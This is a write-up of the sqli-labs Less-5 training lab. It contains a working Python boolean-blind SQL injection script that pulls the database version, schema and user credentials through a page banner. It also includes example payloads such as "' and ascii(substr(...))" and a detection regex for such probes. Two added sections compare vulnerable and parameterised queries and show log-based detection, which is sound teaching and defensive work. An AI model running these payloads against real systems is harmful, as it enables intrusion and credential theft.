
sqli-labs: 5 - error-based injection


Thought 1: when both # and --+ are filtered, the only option left is to close the quote yourself (balance the quoting).

Thought 2: for UNION-based injection you must first determine the number of columns (the field count).

e.g. id=1' order by 3 and '1'='1

sqli-labs Less-5:

First, determine that id is wrapped in single quotes (').

Next, notice that the query result is no longer echoed to the page.

OK, so this is blind injection. Start by determining the MySQL version; if the version is low enough, a DNS side-channel (out-of-band) attack can be considered first.
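Why the "You are in..." banner is enough for a blind attack, and why a bound parameter removes the leak: the following is an added example, not code from the original post or from sqli-labs. It rebuilds the Less-5 pattern on an in-memory SQLite table (constructed sample rows; MySQL's version()/ascii() become sqlite_version()/unicode()) and runs one character of the page's version probe against both the concatenated and the parameterised query.

```python
import sqlite3

# Constructed stand-in for sqli-labs' users table (assumption: id/username/password columns).
SAMPLE_ROWS = [("1", "Dumb", "Dumb"), ("2", "Angelina", "I-kill-you"), ("3", "Dummy", "p@ssword")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id TEXT, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return con


def you_are_in_vulnerable(con, user_id):
    """Less-5 pattern: id is wrapped in single quotes by string concatenation, the row
    is never echoed, and the page only shows the 'You are in...' banner when a row
    came back. That True/False is the whole oracle."""
    sql = "SELECT * FROM users WHERE id='" + user_id + "' LIMIT 1"
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # an error page looks like "no row" to the caller


def you_are_in_fixed(con, user_id):
    """Parameterised query: the value is bound, never parsed as SQL, so the banner
    only depends on whether a user with exactly that id string exists."""
    row = con.execute("SELECT * FROM users WHERE id=? LIMIT 1", (user_id,)).fetchone()
    return row is not None


def recover_first_version_char(oracle):
    """One step of the page's loop: ask the server ten yes/no questions about the
    first character of the DB version. Returns the digit, or None if the application
    never answers 'yes' (no oracle available)."""
    for code in range(48, 58):  # ASCII '0'..'9'
        probe = "1' and unicode(substr(sqlite_version(),1,1))=%d -- " % code
        if oracle(probe):
            return chr(code)
    return None


if __name__ == "__main__":
    con = make_db()
    print("concatenated:", recover_first_version_char(lambda p: you_are_in_vulnerable(con, p)))
    print("parameterised:", recover_first_version_char(lambda p: you_are_in_fixed(con, p)))
```

Against the concatenated query the probe recovers "3" (every SQLite version starts with 3); against the bound parameter every probe is compared literally to the id column and the loop comes back empty, which is exactly the difference the rest of this post exploits.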

Boolean-based blind injection script

```python
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 23 16:03:43 2019

@author: kenshin
"""

import requests, re

url = "http://localhost/sqli-labs/Less-5/?id=1"
pattern_mark = "You are in..........."  # banner shown only when the query returned a row


def get_version(url):
    # MySQL version format: x.x.xx, so the string is 6 characters long
    lst = ["#" for x in range(0, 6)]
    lst[1] = lst[3] = "."
    for i in (1, 3, 5, 6):
        for ii in range(48, 58):
            payload = "' and ascii(substr((select version())," + str(i) + ",1))=" + str(ii) + " --+"
            url_new = url + payload
            r = requests.get(url_new)
            if re.findall(pattern_mark, r.text):
                lst[i - 1] = str(ii - 48)
                break
    sr = "".join(lst)
    print("the version of mysql: " + sr)


def get_user(url):
    # assume user() is at most 15 characters long
    lst = ["#" for x in range(0, 15)]
    for i in range(1, 16):
        for ii in "qwertyuiopasdfghjklzxcvbnm1234567890_-@":
            payload = "' and substr((select user())," + str(i) + ",1)='" + ii + "' --+"
            url_new = url + payload
            r = requests.get(url_new)
            if re.findall(pattern_mark, r.text):
                lst[i - 1] = ii
                print(ii)
                break
    sr = "".join(lst)
    print("the user of database: " + sr)


def get_datadir(url):
    # assume @@datadir is at most 32 characters long
    lst = ["#" for x in range(0, 32)]
    for i in range(1, 33):
        for ii in ":\\qwertyuiopasdfghjklzxcvbnm1234567890_-":
            payload = "' and substr((select @@datadir)," + str(i) + ",1)='" + ii + "' --+"
            url_new = url + payload
            r = requests.get(url_new)
            if re.findall(pattern_mark, r.text):
                lst[i - 1] = ii
                print(ii)
                break
    sr = "".join(lst)
    print(sr)


def get_currTB(url):
    # assume the current database has at most 10 tables [indexed by i]
    for i in range(0, 10):
        # assume the longest table name is 10 characters [indexed by ii]
        lst = ["#" for x in range(0, 10)]
        for ii in range(1, 11):
            for iii in "qwertyuiopasdfghjklzxcvbnm1234567890_-#":
                # substr() needs a single column, so select table_name rather than *
                payload = "' and substr((select table_name from information_schema.tables where table_schema=database() limit " + str(i) + ",1)," + str(ii) + ",1)='" + str(iii) + "' --+"
                url_new = url + payload
                r = requests.get(url_new)
                if re.findall(pattern_mark, r.text):
                    lst[ii - 1] = iii
                    print(iii)
                    break
            if lst[ii - 1] == "#":  # no character matched: end of this name
                break
        sr = "".join(lst)
        print(sr)


def get_Column(url, tb):
    # assume the table has at most 3 columns [indexed by i]
    for i in range(0, 3):
        # assume the longest column name is 10 characters
        lst = ["#" for x in range(0, 10)]
        for ii in range(1, 11):
            for iii in "@qwertyuiopasdfghjklzxcvbnm1234567890_-#":
                payload = "' and substr((select column_name from information_schema.columns where table_name='" + tb + "' limit " + str(i) + ",1)," + str(ii) + ",1)='" + str(iii) + "' --+"
                url_new = url + payload
                r = requests.get(url_new)
                if re.findall(pattern_mark, r.text):
                    lst[ii - 1] = iii
                    print(iii)
                    break
            if lst[ii - 1] == "#":
                break
        sr = "".join(lst)
        print(sr)


def get_data(url):
    # assume the table has 10 rows [indexed by i]
    for i in range(1, 11):
        # assume each row's concatenated data is at most 25 characters
        lst = ["#" for x in range(0, 25)]
        for ii in range(1, 26):
            for iii in "%@qwertyuiopasdfghjklzxcvbnm1234567890_-#":
                # too many variables: table and column names are set here in the code
                payload = "' and substr((select group_concat(id,'%',username,'%',password) from security.users where id=" + str(i) + ")," + str(ii) + ",1)='" + str(iii) + "' --+"
                url_new = url + payload
                r = requests.get(url_new)
                if re.findall(pattern_mark, r.text):
                    lst[ii - 1] = iii
                    print(iii)
                    break
            if lst[ii - 1] == "#":
                break
        sr = "".join(lst)
        print(sr)


"""
dnslog
"""


# get_version(url)
# get_user(url)
# get_datadir(url)
# get_currTB(url)
# tb = input("select table >> ")
# get_Column(url, tb)
get_data(url)
```
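Seen from the server side, the loops above are noisy: one client sends dozens of requests to the same endpoint, each a closed quote followed by and/substr()/ascii(), differing only in the compared value. The following is an added example, not from the original post, that parses Apache-style access-log lines (constructed sample data), URL-decodes the query string and flags clients that hit one path with a burst of such probes; the regular expression, threshold and log format are my assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (sample data, not taken from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [23/Mar/2019:16:03:43 +0800] "GET /sqli-labs/Less-5/?id=1 HTTP/1.1" 200 912
10.0.0.9 - - [23/Mar/2019:16:05:01 +0800] "GET /sqli-labs/Less-5/?id=1%27%20and%20ascii%28substr%28%28select%20version%28%29%29%2C1%2C1%29%29%3D48%20--+ HTTP/1.1" 200 912
10.0.0.9 - - [23/Mar/2019:16:05:01 +0800] "GET /sqli-labs/Less-5/?id=1%27%20and%20ascii%28substr%28%28select%20version%28%29%29%2C1%2C1%29%29%3D49%20--+ HTTP/1.1" 200 912
10.0.0.9 - - [23/Mar/2019:16:05:02 +0800] "GET /sqli-labs/Less-5/?id=1%27%20and%20ascii%28substr%28%28select%20version%28%29%29%2C1%2C1%29%29%3D53%20--+ HTTP/1.1" 200 912
10.0.0.9 - - [23/Mar/2019:16:05:02 +0800] "GET /sqli-labs/Less-5/?id=1%27%20and%20substr%28%28select%20user%28%29%29%2C1%2C1%29%3D%27r%27%20--+ HTTP/1.1" 200 912
10.0.0.5 - - [23/Mar/2019:16:06:10 +0800] "GET /search?q=rock%27n%27roll HTTP/1.1" 200 455
"""

# client, identd, user, [timestamp], "METHOD target proto", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')

# A closed quote, a boolean operator, then one of the functions blind probes are built from.
PROBE_RE = re.compile(
    r"""(?ix)
    ['"]\s*(?:and|or)\b                  # attacker closed the quote and appended a condition
    .*?                                  # subquery, parentheses, anything in between
    \b(?:ascii|ord|substr|substring|mid|sleep|benchmark|if)\s*\(
    """
)


def parse_line(line):
    """Split one combined-format line into fields; the query is returned URL-decoded
    because that is the form the database actually saw."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, size = m.groups()
    path, _, query = target.partition("?")
    return {"ip": ip, "ts": ts, "method": method, "path": path,
            "query": unquote_plus(query), "status": int(status), "size": size}


def is_boolean_probe(decoded_query):
    return PROBE_RE.search(decoded_query) is not None


def find_probers(log_text, threshold=3):
    """Count probe-shaped requests per (client, path) and return the pairs at or
    above the threshold; a single odd request is not worth an alert, a burst is."""
    hits = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_boolean_probe(rec["query"]):
            hits[(rec["ip"], rec["path"])] += 1
    return {key: n for key, n in hits.items() if n >= threshold}


if __name__ == "__main__":
    for (ip, path), n in find_probers(SAMPLE_LOG).items():
        print("%s sent %d boolean-blind probes to %s" % (ip, n, path))
```

Decoding before matching matters: the script's `--+` and `%27` only look like SQL once the percent-encoding is undone. Status code and response size are identical for the "true" and "false" probes here, as they are on Less-5, so the request pattern, not the response, is what the detection keys on; the search line with `rock'n'roll` shows that a quote alone is not enough to trigger it.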